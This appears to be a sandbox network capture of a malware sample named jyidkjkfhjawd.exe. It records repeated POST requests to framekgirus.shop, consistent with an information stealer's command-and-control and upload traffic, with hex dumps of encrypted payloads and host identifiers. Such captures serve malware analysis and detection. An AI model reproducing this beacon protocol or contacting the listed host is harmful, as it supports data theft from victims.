                                                                                                                 2024-12-30 10:59:39 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 42
                                                                                                                Host: framekgirus.shop
                                                                                                                 2024-12-30 10:59:39 UTC | 42 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6e 62 59 52 4b 6c 2d 2d 26 6a 3d
                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=nbYRKl--&j=
                                                                                                                 2024-12-30 10:59:40 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Mon, 30 Dec 2024 10:59:40 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=1tkeu446nbqqn1nq4o64adcn3c; expires=Fri, 25 Apr 2025 04:46:19 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vj9ADm72U5Yr2mgW7I7z4mSLf5bXEqLo%2Fe8qV8pXZ4LaiKiplrBk3T3NGGXfH12EaoEKHdNKZrglzavR7kKUwAdr%2Br3jxySm8upFo2kjbaed%2B6epk81WwoUc5sazdtee%2FN1D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fa1858f3f874356-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2415&min_rtt=2342&rtt_var=930&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=942&delivery_rate=1246797&cwnd=237&unsent_bytes=0&cid=49fdb94aea91abc0&ts=464&x=0"
                                                                                                                2024-12-30 10:59:40 UTC246INData Raw: 31 63 61 61 0d 0a 34 59 30 7a 68 4f 49 2f 70 6f 4e 57 72 61 39 36 2b 78 2f 56 73 35 65 30 63 4b 35 70 2f 44 4a 6b 79 33 70 75 57 2b 63 56 6e 59 61 61 72 30 57 6d 32 41 75 4b 6f 53 58 49 6a 55 43 50 62 61 44 57 75 35 59 52 79 6b 76 47 56 41 57 6e 43 51 74 33 78 57 50 77 70 4e 76 72 55 75 69 52 57 6f 71 68 4d 39 57 4e 51 4b 42 6b 39 39 62 35 6c 6b 71 4d 44 4a 5a 51 42 61 63 59 44 7a 43 49 5a 66 48 6c 69 65 46 55 37 49 64 63 77 75 49 36 77 4d 6f 66 6e 6e 36 2f 33 66 37 5a 47 4d 4e 4c 30 42 41 42 73 56 68 55 65 61 70 77 36 65 65 73 37 45 44 76 77 45 4b 4b 2b 48 54 49 77 56 6a 42 50 62 54 57 39 64 67 57 79 67 4b 55 57 67 79 76 47 51 6f 78 6c 33 7a 37 37 6f 6e 76 56 2b 32 4e 56 64 62 76 4d 4d 66 42 47 5a 52 2b 39 35 2b 31 30 51 71 4d
                                                                                                                Data Ascii: 1caa4Y0zhOI/poNWra96+x/Vs5e0cK5p/DJky3puW+cVnYaar0Wm2AuKoSXIjUCPbaDWu5YRykvGVAWnCQt3xWPwpNvrUuiRWoqhM9WNQKBk99b5lkqMDJZQBacYDzCIZfHlieFU7IdcwuI6wMofnn6/3f7ZGMNL0BABsVhUeapw6ees7EDvwEKK+HTIwVjBPbTW9dgWygKUWgyvGQoxl3z77onvV+2NVdbvMMfBGZR+95+10QqM
                                                                                                                2024-12-30 10:59:40 UTC1369INData Raw: 55 39 34 44 4e 4b 6f 4a 48 53 79 49 5a 2f 6d 6b 6e 4b 46 49 70 6f 64 52 68 4c 6c 30 78 38 45 57 6e 48 36 34 31 76 54 57 41 4d 4d 4c 6e 56 67 4f 72 52 49 44 4e 6f 70 35 39 65 4f 4c 35 6c 62 70 68 31 58 43 37 6a 65 50 67 31 69 65 5a 66 65 4a 74 66 59 43 7a 77 69 4b 58 52 66 70 42 30 49 67 78 58 44 7a 70 4e 75 76 56 2b 69 42 55 4d 54 7a 50 4d 54 47 48 59 74 32 76 74 7a 34 31 68 2f 47 42 4a 31 51 41 61 4d 53 41 7a 4f 42 65 76 4c 69 67 2b 38 52 71 4d 42 61 33 4b 46 73 6a 2b 34 64 69 58 71 37 78 37 66 73 55 74 4e 46 68 78 41 42 70 56 68 55 65 59 31 79 2f 4f 65 49 34 46 4c 75 69 30 2f 45 38 7a 4c 43 79 41 71 66 65 4c 6e 62 39 73 51 59 77 67 32 64 57 51 32 67 48 51 73 39 78 54 6d 2f 34 35 75 76 43 61 61 68 55 4d 2f 74 50 74 6a 4e 57 49 59 7a 72 70 48 79 32 6c 4b
                                                                                                                Data Ascii: U94DNKoJHSyIZ/mknKFIpodRhLl0x8EWnH641vTWAMMLnVgOrRIDNop59eOL5lbph1XC7jePg1ieZfeJtfYCzwiKXRfpB0IgxXDzpNuvV+iBUMTzPMTGHYt2vtz41h/GBJ1QAaMSAzOBevLig+8RqMBa3KFsj+4diXq7x7fsUtNFhxABpVhUeY1y/OeI4FLui0/E8zLCyAqfeLnb9sQYwg2dWQ2gHQs9xTm/45uvCaahUM/tPtjNWIYzrpHy2lK
                                                                                                                2024-12-30 10:59:40 UTC1369INData Raw: 51 72 70 56 6b 77 2b 6e 54 65 6e 70 4b 6e 73 52 65 57 4b 48 2f 48 69 4f 73 48 4b 44 74 6c 69 2b 63 69 31 30 52 36 4d 55 39 35 64 42 36 45 65 48 6a 61 49 64 50 48 71 6a 4f 70 65 37 6f 42 64 79 65 51 77 78 4d 59 62 6c 48 6d 6c 32 2f 58 65 46 38 30 42 6c 42 42 49 36 52 38 55 65 64 30 33 7a 76 4f 49 72 57 54 6c 6a 6c 50 44 39 33 54 51 67 77 48 5a 65 72 75 52 72 5a 59 66 78 41 36 62 58 77 65 6a 46 67 6b 7a 69 58 2f 78 35 35 48 67 56 65 61 4d 56 63 37 73 4f 73 76 46 45 5a 4a 32 73 64 48 30 33 46 4b 43 53 35 6c 49 52 76 46 59 4f 44 36 4a 65 76 43 6d 74 75 78 66 36 49 64 4c 68 50 35 36 31 6f 30 66 6c 54 33 76 6b 66 6e 66 45 73 63 42 6d 6c 41 42 70 42 30 50 50 6f 5a 36 2b 4f 36 4e 36 46 58 71 69 56 44 43 34 54 50 4c 79 41 71 63 64 4c 76 64 74 5a 68 53 79 78 50 65
                                                                                                                Data Ascii: QrpVkw+nTenpKnsReWKH/HiOsHKDtli+ci10R6MU95dB6EeHjaIdPHqjOpe7oBdyeQwxMYblHml2/XeF80BlBBI6R8Ued03zvOIrWTljlPD93TQgwHZeruRrZYfxA6bXwejFgkziX/x55HgVeaMVc7sOsvFEZJ2sdH03FKCS5lIRvFYOD6JevCmtuxf6IdLhP561o0flT3vkfnfEscBmlABpB0PPoZ6+O6N6FXqiVDC4TPLyAqcdLvdtZhSyxPe
                                                                                                                2024-12-30 10:59:40 UTC1369INData Raw: 38 41 65 64 30 33 39 75 32 52 34 56 2f 76 6a 56 76 4d 35 6a 72 43 78 68 36 53 65 72 44 58 2b 4e 34 66 79 51 69 66 56 41 79 37 47 77 63 7a 69 48 32 2f 71 73 50 6f 53 61 62 59 48 65 50 74 48 64 2f 57 43 6f 38 39 71 4a 2f 73 6c 68 58 41 53 38 59 51 42 61 59 52 41 7a 47 4e 65 50 44 67 6a 65 6c 58 36 34 56 53 7a 76 4d 38 77 63 41 54 6c 6e 61 6c 30 66 6a 53 48 73 67 44 6c 56 70 47 35 31 67 4c 49 63 55 76 76 39 47 4f 34 46 48 6c 6c 68 33 62 72 79 32 50 79 68 54 5a 4a 66 66 64 2b 39 59 64 77 41 65 56 57 41 65 6c 46 67 73 38 6a 48 2f 33 39 6f 4c 72 57 65 65 4f 55 73 58 6c 4d 63 72 4a 48 35 31 37 75 4a 47 37 6c 68 58 55 53 38 59 51 4b 59 34 74 54 68 69 2f 4e 2b 43 71 6d 71 39 57 36 73 41 46 68 4f 30 33 77 38 55 58 6e 33 53 37 32 2f 7a 64 48 73 63 50 6b 6c 6b 44 72
                                                                                                                Data Ascii: 8Aed039u2R4V/vjVvM5jrCxh6SerDX+N4fyQifVAy7GwcziH2/qsPoSabYHePtHd/WCo89qJ/slhXAS8YQBaYRAzGNePDgjelX64VSzvM8wcATlnal0fjSHsgDlVpG51gLIcUvv9GO4FHllh3bry2PyhTZJffd+9YdwAeVWAelFgs8jH/39oLrWeeOUsXlMcrJH517uJG7lhXUS8YQKY4tThi/N+Cqmq9W6sAFhO03w8UXn3S72/zdHscPklkDr
2024-12-30 10:59:40 UTC  1369               IN         Data Raw: 44 5a 66 6a 74 6b 65 46 63 36 59 68 56 7a 65 41 77 79 73 41 65 6c 58 65 32 31 76 76 59 47 6f 78 46 33 6c 63 65 36 55 42 4d 47 4a 56 73 37 66 4b 4f 7a 6c 7a 70 77 45 4b 4b 2b 48 54 49 77 56 6a 42 50 62 37 44 38 64 73 41 78 51 79 51 58 77 57 37 47 51 45 79 6c 33 44 77 34 49 54 6a 56 2b 6d 47 58 4d 48 72 4f 4d 6a 49 45 35 5a 78 39 35 2b 31 30 51 71 4d 55 39 35 2b 44 62 6f 50 44 7a 65 4f 59 65 53 6b 6e 4b 46 49 70 6f 64 52 68 4c 6c 30 7a 4d 59 54 6e 58 32 37 30 66 48 62 45 74 34 45 6d 56 63 50 6f 67 6f 47 50 6f 4a 38 39 2b 2b 4d 36 55 50 71 6a 6b 2f 42 38 79 61 50 67 31 69 65 5a 66 65 4a 74 65 41 56 33 42 75 64 45 6a 65 2f 47 78 6f 79 69 48 75 2f 2b 38 33 32 45 65 47 4d 48 5a 79 68 4d 73 44 45 47 35 5a 38 76 74 33 34 30 78 76 4a 43 70 68 55 44 4b 4d 59 43 6a
    Data Ascii: DZfjtkeFc6YhVzeAwysAelXe21vvYGoxF3lce6UBMGJVs7fKOzlzpwEKK+HTIwVjBPb7D8dsAxQyQXwW7GQEyl3Dw4ITjV+mGXMHrOMjIE5Zx95+10QqMU95+DboPDzeOYeSknKFIpodRhLl0zMYTnX270fHbEt4EmVcPogoGPoJ89++M6UPqjk/B8yaPg1ieZfeJteAV3BudEje/GxoyiHu/+832EeGMHZyhMsDEG5Z8vt340xvJCphUDKMYCj
2024-12-30 10:59:40 UTC  1369               IN         Data Raw: 2f 63 50 6f 58 61 62 59 48 63 66 6d 4e 38 37 48 45 5a 56 79 73 4e 58 6e 33 42 58 65 43 70 39 62 43 36 55 59 41 54 53 50 64 76 62 70 6a 2b 4a 57 34 59 39 59 68 4b 39 30 79 4e 56 59 77 54 32 57 33 50 37 61 53 5a 5a 4c 67 52 34 66 36 52 38 41 65 64 30 33 2f 2b 36 47 35 56 7a 6c 6a 31 37 57 34 44 4c 64 7a 52 57 54 62 37 33 61 38 4e 73 66 77 51 69 59 56 67 32 6c 43 67 55 35 68 6e 79 2f 71 73 50 6f 53 61 62 59 48 65 66 32 49 73 58 4b 46 49 39 32 74 74 4c 6a 32 77 4b 4d 52 64 35 42 41 62 68 59 56 43 2b 56 59 50 6a 37 7a 66 59 52 34 59 77 64 6e 4b 45 79 78 73 73 66 6e 33 4f 6c 31 50 50 5a 48 63 55 43 6d 6c 67 46 71 52 77 49 50 6f 42 30 38 2b 2b 45 37 46 37 69 69 56 50 4e 37 6e 53 42 6a 52 2b 42 50 65 2b 52 31 4d 30 52 77 41 62 65 54 30 69 77 57 41 73 31 78 53 2b
    Data Ascii: /cPoXabYHcfmN87HEZVysNXn3BXeCp9bC6UYATSPdvbpj+JW4Y9YhK90yNVYwT2W3P7aSZZLgR4f6R8Aed03/+6G5Vzlj17W4DLdzRWTb73a8NsfwQiYVg2lCgU5hny/qsPoSabYHef2IsXKFI92ttLj2wKMRd5BAbhYVC+VYPj7zfYR4YwdnKEyxssfn3Ol1PPZHcUCmlgFqRwIPoB08++E7F7iiVPN7nSBjR+BPe+R1M0RwAbeT0iwWAs1xS+
2024-12-30 10:59:40 UTC  255                IN         Data Raw: 33 48 74 6c 6c 6a 44 39 33 62 36 7a 68 61 58 65 71 47 52 36 75 6c 63 6a 41 53 45 45 46 36 51 41 55 77 2b 69 54 65 6e 70 4a 62 6f 55 65 47 61 53 38 50 74 4a 63 54 41 46 4c 74 79 73 4d 66 32 32 52 48 64 41 74 4a 62 43 2b 6c 57 54 44 36 64 4e 36 65 6b 72 4f 68 48 35 61 39 65 31 65 68 30 67 59 30 66 6a 7a 33 76 6b 63 75 57 41 4d 38 62 6e 56 38 58 6c 31 68 55 49 4c 73 33 39 50 4b 45 2f 31 4c 77 69 31 44 49 38 41 71 50 6c 55 7a 4c 4c 2b 57 44 70 38 6c 53 30 7a 54 51 45 41 66 70 51 44 55 67 78 57 47 2f 76 4e 47 68 45 66 54 41 42 59 53 6d 4e 39 33 66 48 70 70 72 74 4a 62 4c 36 44 58 61 41 5a 6c 41 41 62 34 58 54 48 66 46 65 4c 2b 38 75 71 39 59 34 5a 74 4d 30 75 77 6b 79 49 30 6e 31 7a 32 76 6b 61 32 57 4a 38 38 46 6b 46 63 51 75 46 55 72 4c 34 39 77 37 2b 0d 0a
    Data Ascii: 3HtlljD93b6zhaXeqGR6ulcjASEEF6QAUw+iTenpJboUeGaS8PtJcTAFLtysMf22RHdAtJbC+lWTD6dN6ekrOhH5a9e1eh0gY0fjz3vkcuWAM8bnV8Xl1hUILs39PKE/1Lwi1DI8AqPlUzLL+WDp8lS0zTQEAfpQDUgxWG/vNGhEfTABYSmN93fHpprtJbL6DXaAZlAAb4XTHfFeL+8uq9Y4ZtM0uwkyI0n1z2vka2WJ88FkFcQuFUrL49w7+
2024-12-30 10:59:40 UTC  1369               IN         Data Raw: 32 63 65 61 0d 0a 4f 55 34 42 47 6f 77 46 75 45 75 57 65 42 6a 52 79 49 50 65 2b 42 70 34 31 48 6e 31 7a 4f 41 68 6e 6e 41 55 77 76 78 53 2b 74 71 73 50 39 45 62 37 41 47 73 66 7a 4a 73 6e 4f 44 70 6f 36 69 65 2f 53 7a 42 2f 4b 48 49 39 75 4f 4b 34 43 41 54 2b 53 5a 72 50 78 67 4f 46 66 34 5a 59 64 69 71 45 37 6a 35 55 68 32 54 58 33 37 72 75 57 43 6f 78 54 33 6d 55 46 70 78 59 4c 4c 35 51 36 32 50 36 4f 36 55 62 33 77 42 4f 45 35 33 53 58 6e 31 62 5a 65 61 61 52 72 59 5a 41 6c 31 37 4e 42 31 62 37 42 30 49 67 78 57 47 2f 76 4e 47 68 45 66 54 41 42 59 53 6d 4e 39 33 66 48 70 70 72 74 4a 62 4c 36 44 7a 4c 44 5a 74 58 46 75 73 32 42 79 32 43 4e 37 47 6b 6a 4b 38 4a 33 38 41 56 68 4e 35 36 6a 39 56 59 77 54 32 43 30 76 76 59 46 64 6f 61 30 33 34 42 72 78 30
    Data Ascii: 2ceaOU4BGowFuEuWeBjRyIPe+Bp41Hn1zOAhnnAUwvxS+tqsP9Eb7AGsfzJsnODpo6ie/SzB/KHI9uOK4CAT+SZrPxgOFf4ZYdiqE7j5Uh2TX37ruWCoxT3mUFpxYLL5Q62P6O6Ub3wBOE53SXn1bZeaaRrYZAl17NB1b7B0IgxWG/vNGhEfTABYSmN93fHpprtJbL6DzLDZtXFus2By2CN7GkjK8J38AVhN56j9VYwT2C0vvYFdoa034Brx0
2024-12-30 10:59:40 UTC  1369               IN         Data Raw: 2b 32 6b 32 36 38 57 35 5a 4a 50 77 75 49 69 7a 49 6f 6d 70 31 71 35 31 76 54 41 41 74 73 45 6f 47 34 54 71 68 59 43 50 70 4e 6d 76 36 72 44 34 42 47 2b 75 52 32 4d 6f 51 75 42 6a 51 44 5a 4a 66 66 6b 39 74 67 63 79 78 32 50 48 53 47 6e 48 77 30 76 6c 57 44 77 70 4d 32 76 56 36 62 59 44 34 71 68 4d 4e 36 4e 51 4d 6b 76 37 49 53 6d 67 55 4b 65 46 4e 42 4a 52 72 39 59 56 47 76 4c 4e 2b 32 6b 32 36 38 57 35 5a 4a 50 77 75 49 69 7a 49 6f 6d 70 31 71 35 31 76 54 41 41 74 73 45 30 58 34 77 69 43 59 79 4c 49 5a 35 38 65 4f 56 2f 68 47 6f 77 46 4b 45 75 51 32 50 68 56 69 6d 4d 2f 66 4a 74 59 35 53 2b 51 69 51 58 67 47 2f 43 55 45 65 69 33 44 2b 38 70 50 34 58 71 6d 75 61 2b 57 68 65 6f 2f 4c 57 4d 45 76 2b 5a 48 78 78 31 4b 55 57 38 77 4c 55 2f 70 50 58 47 75 61
    Data Ascii: +2k268W5ZJPwuIizIomp1q51vTAAtsEoG4TqhYCPpNmv6rD4BG+uR2MoQuBjQDZJffk9tgcyx2PHSGnHw0vlWDwpM2vV6bYD4qhMN6NQMkv7ISmgUKeFNBJRr9YVGvLN+2k268W5ZJPwuIizIomp1q51vTAAtsE0X4wiCYyLIZ58eOV/hGowFKEuQ2PhVimM/fJtY5S+QiQXgG/CUEei3D+8pP4Xqmua+Wheo/LWMEv+ZHxx1KUW8wLU/pPXGua


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.4  49735        104.21.18.194   443               7940  C:\FkSpRTrp\jyidkjkfhjawd.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:59:41 UTC  276                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=JZVI9SMSXV6J
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 18122
    Host: framekgirus.shop
2024-12-30 10:59:41 UTC  15331              OUT        Data Raw: 2d 2d 4a 5a 56 49 39 53 4d 53 58 56 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 38 45 36 39 30 41 30 42 42 32 32 44 38 36 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 4a 5a 56 49 39 53 4d 53 58 56 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 5a 56 49 39 53 4d 53 58 56 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 4a 5a 56 49 39 53 4d 53 58 56 36 4a 0d 0a 43 6f 6e 74 65
    Data Ascii: --JZVI9SMSXV6JContent-Disposition: form-data; name="hwid"658E690A0BB22D8620A4C476FD51BCB1--JZVI9SMSXV6JContent-Disposition: form-data; name="pid"2--JZVI9SMSXV6JContent-Disposition: form-data; name="lid"nbYRKl----JZVI9SMSXV6JConte
2024-12-30 10:59:41 UTC  2791               OUT        Data Raw: 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52
    Data Ascii: f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
2024-12-30 10:59:41 UTC  1129               IN         HTTP/1.1 200 OK
    Date: Mon, 30 Dec 2024 10:59:41 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=437d38e4nfua65dunl9bsd3kns; expires=Fri, 25 Apr 2025 04:46:20 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HB%2FEkFIjf968QTeaBSEYpf7tMnT66jq2AcSYdQlljBtMboL8osu0xVnPTIVBBRLowtqgWQWJ%2FqOpedd8Urk%2BLO465Gj912gelas5yvJ%2FL33zgwuHQ%2BMhabCYh3GaWPHyrk9u"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fa18597ed01c457-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1671&rtt_var=637&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2839&recv_bytes=19078&delivery_rate=1703617&cwnd=252&unsent_bytes=0&cid=fc619c2a15f329f6&ts=569&x=0"
2024-12-30 10:59:41 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-30 10:59:41 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.4  49739        104.21.18.194   443               7940  C:\FkSpRTrp\jyidkjkfhjawd.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:59:42 UTC  278                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=ONFA21ZDLTMDHK1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8761
    Host: framekgirus.shop
2024-12-30 10:59:42 UTC  8761               OUT        Data Raw: 2d 2d 4f 4e 46 41 32 31 5a 44 4c 54 4d 44 48 4b 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 38 45 36 39 30 41 30 42 42 32 32 44 38 36 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 4f 4e 46 41 32 31 5a 44 4c 54 4d 44 48 4b 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 4e 46 41 32 31 5a 44 4c 54 4d 44 48 4b 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 4f 4e 46 41 32 31 5a 44 4c 54
    Data Ascii: --ONFA21ZDLTMDHK1Content-Disposition: form-data; name="hwid"658E690A0BB22D8620A4C476FD51BCB1--ONFA21ZDLTMDHK1Content-Disposition: form-data; name="pid"2--ONFA21ZDLTMDHK1Content-Disposition: form-data; name="lid"nbYRKl----ONFA21ZDLT
2024-12-30 10:59:42 UTC  1127               IN         HTTP/1.1 200 OK
    Date: Mon, 30 Dec 2024 10:59:42 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=sldh70706pf167q8vuq23d31sg; expires=Fri, 25 Apr 2025 04:46:21 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hDd26an3UvD3ajFrVweCTThi9xp2GVGI%2BHz7DylMe9OQNX%2BNXQiutzFe%2BGv1vQB9O0DV5JFl83phxfi1zpS0kEaE2vK6u4DwHK%2FZpGRfSJgFmI0gPq09TM1DFzN%2FI2AxCR6I"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fa1859f0e967293-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1819&rtt_var=696&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9697&delivery_rate=1557333&cwnd=158&unsent_bytes=0&cid=bc99c9fd107a7594&ts=493&x=0"
2024-12-30 10:59:42 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-30 10:59:42 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.4  49741        104.21.18.194   443               7940  C:\FkSpRTrp\jyidkjkfhjawd.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:59:43 UTC  274                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=441RW6H328
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20384
    Host: framekgirus.shop
2024-12-30 10:59:43 UTC  15331              OUT        Data Raw: 2d 2d 34 34 31 52 57 36 48 33 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 38 45 36 39 30 41 30 42 42 32 32 44 38 36 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 34 34 31 52 57 36 48 33 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 34 31 52 57 36 48 33 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 34 34 31 52 57 36 48 33 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
    Data Ascii: --441RW6H328Content-Disposition: form-data; name="hwid"658E690A0BB22D8620A4C476FD51BCB1--441RW6H328Content-Disposition: form-data; name="pid"3--441RW6H328Content-Disposition: form-data; name="lid"nbYRKl----441RW6H328Content-Dispo
